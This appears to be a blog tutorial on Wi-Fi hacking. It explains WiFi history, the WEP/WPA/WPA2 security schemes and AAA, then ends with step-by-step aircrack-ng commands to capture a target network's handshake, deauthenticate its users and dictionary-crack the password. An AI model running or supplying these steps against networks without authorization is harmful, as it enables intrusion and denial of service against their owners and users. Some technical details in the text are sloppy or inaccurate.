Module: Wi-Fi Hacking

What is WiFi, and How Does it Work?

At a base level, WiFi is a way of getting broadband internet to a device using wireless transmitters and radio signals. Once a transmitter receives data from the internet, it converts the data into a radio signal that can be received and read by WiFi enabled devices. Information is then exchanged between the transmitter and the device.

When was WiFi invented?

WiFi was invented and first released for consumers in 1997, when a committee called 802.11 was created. This led to the creation of IEEE802.11, which refers to a set of standards that define communication for wireless local area networks (WLANs). Following this, a basic specification for WiFi was established, allowing two megabytes per second of data transfer wirelessly between devices. This sparked a development in prototype equipment (routers) to comply with IEEE802.11, and in 1999, WiFi was introduced for home use.

WiFi Frequencies

WiFi uses electromagnetic waves to communicate data that run at two main frequencies: 2.4Ghz (802.11b) and 5Ghz (802.11a). For many years, 2.4Ghz was a popular choice for WiFi users, as it worked with most mainstream devices and was less expensive than 11a.

Links :

Basics Thermology Wi-fi hacking

Security Technology

From the perspective of the hacker, wireless security technologies are among the most pertinent features. Multiple security technologies have been deployed in Wi-Fi to make an inherently insecure technology secure. Our attack approach will depend upon which of these security technologies is being deployed.

So, let’s take a quick look at them here.


WEP, or wired equivalent privacy, was the first wireless security scheme employed. As its names implies, it was designed to provide security to the end-user that was essentially equivalent to the privacy that was enjoyed in a wired environment. Unfortunately, it failed miserably.

For a number of reasons, WEP is extraordinarily easy to crack because of a flawed implementation of the RC4 encryption algorithm. It’s not unusual to be able to crack WEP in less than 5 minutes. This is because WEP used a very small (24-bit) initialization vector (IV) that could be captured in the DataStream, and this IV could then be used to discover the password using statistical techniques.

Despite this, I still find it being used in household and small business implementations, but seldom in an enterprise environment.


WPA was the response by the industry to the revealed weaknesses of WEP. It’s often referred to as WPA1 to distinguish it from WPA2.

WPA used Temporal Key Integrity Protocol (TKIP) to improve the security of WEP without requiring new hardware. It still uses WEP for encryption, but it makes the statistical attacks used to crack WEP much more difficult and time-consuming.


WPA2-PSK is the implementation of WPA2 for the home or small business user. As the name implies, it’s the WPA2 implementation that uses a pre-shared key (PSK). It’s this security standard that is used by most households today, and although it’s far more secure, it’s still vulnerable to various attacks.

A feature that was added in 2007 called Wi-Fi Protected Setup, or WPS, allows us to bypass the security in WP2-PSK . We’ll look at a few attacks on WPA2-PSK in coming weeks.


WPA2-AES is the enterprise implementation of WPA2. It uses the Advanced Encryption Standard or AES to encrypt data and is the most secure. It’s often coupled with a RADIUS server that is dedicated for authentication.

Although cracking it is possible, it significantly more difficult.

WEP – Cracking link


WPA2 – Cracking link


AAA – Concept

Authentication refers to unique identifying information from each system user, generally in the form of a username and password. System administrators monitor and add or delete authorized users from the system.

Authorization refers to the process of adding or denying individual user access to a computer network and its resources. Users may be given different authorization levels that limit their access to the network and associated resources. Authorization determination may be based on geographical location restrictions, date or time-of-day restrictions, frequency of logins or multiple logins by single individuals or entities. Other associated types of authorization service include route assignments, IP address filtering, bandwidth traffic management and encryption.

Accounting refers to the record-keeping and tracking of user activities on a computer network. For a given time period this may include, but is not limited to, real-time accounting of time spent accessing the network, the network services employed or accessed, capacity and trend analysis, network cost allocations, billing data, login data for user authentication and authorization, and the data or data amount accessed or transferred.

Examples of AAA protocols include: 

  • Diameter, a successor to Remote Authentication Dial-In User Service (RADIUS)
  • Terminal Access Controller Access-Control System (TACACS)
  • Terminal Access Controller Access-Control System Plus (TACACS+) a proprietary Cisco Systems protocol that provides access for network servers, routers and other network computing devices.

Types of AAA servers include: 

  • Access Network AAA (AN-AAA) which communicates with radio network controllers
  • Broker AAA (B-AAA), which manages traffic between roaming partner networks
  • Home AAA (H-AAA)

Steps to perform Wi-fi hacking:

  1. Check the wireless network adopter
    1. [email protected]: ifconfig
  2. Activate the monitor mode of your wireless card
    1. [email protected]: airmon-ng start wlan1
  3. Activate the capturing mode in Wi-Fi
    1. [email protected]: airodump-ng wlan1mon
  4. Start capturing target signals and make a folder to store the keys handshake.
    1. [email protected]: airodump-ng -c 1 –write /root/Desktop/lucifer2.0 –bssid ——————– wlan1mon
  • -c represent as a channel no. and there are 14 channel no. and every wi-fi has unique channel no. so we have to put the exact no.
    • –bssid is the mac address of the target wi-fi
    • –write function is used to make a file off the target.
  •   in this process we will send some deauth packets to the victims so we can capture the handshake shared with the two clients.
    • –deauth packet will jam the wi-fi signals and or you can say kick out the legimate users from the network.

[email protected]: Aireplay-ng –deauth 1000 -a -Target bssid- wlan1mon

  • In this process we will use aircrack-ng to simply brute-force attack.

[email protected]: aircrack-ng -a2 -b -Target bssid- -w /root/Desktop/rockyou.txt /root/Desktop/Lucifer.Cap

in aircrack-ng we have to provide a dictionary so it will match the hashes with some random words in this case we can identify the password.

Wordlist with crunch


Partho Kr. Mandal

By admin

Leave a Reply

Your email address will not be published. Required fields are marked *